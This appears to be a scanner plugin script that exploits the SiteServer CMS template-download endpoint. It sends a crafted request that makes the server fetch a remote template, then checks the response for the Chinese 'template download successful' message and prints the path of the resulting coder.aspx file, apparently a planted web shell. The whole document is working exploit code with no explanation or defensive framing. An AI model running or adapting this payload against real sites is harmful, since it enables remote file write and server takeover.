#request url = var
#define payload = /SiteServer/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=test&downloadUrl=Mu4qBmu7IHKCg30uPHV54RvihWpSgPTpjdF9n0yrTMz9pqoVmJBC0slash0A0equals00equals0&directoryName=fctest
#define bug = 站点模板下载成功
#define info = /SiteFiles/SiteTemplates/fctest/coder.aspx

function main(args)
{
	res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
	if(StrFindStr(res[0],bug,0)!= "-1")
	{
		print(url.info);
	}
}
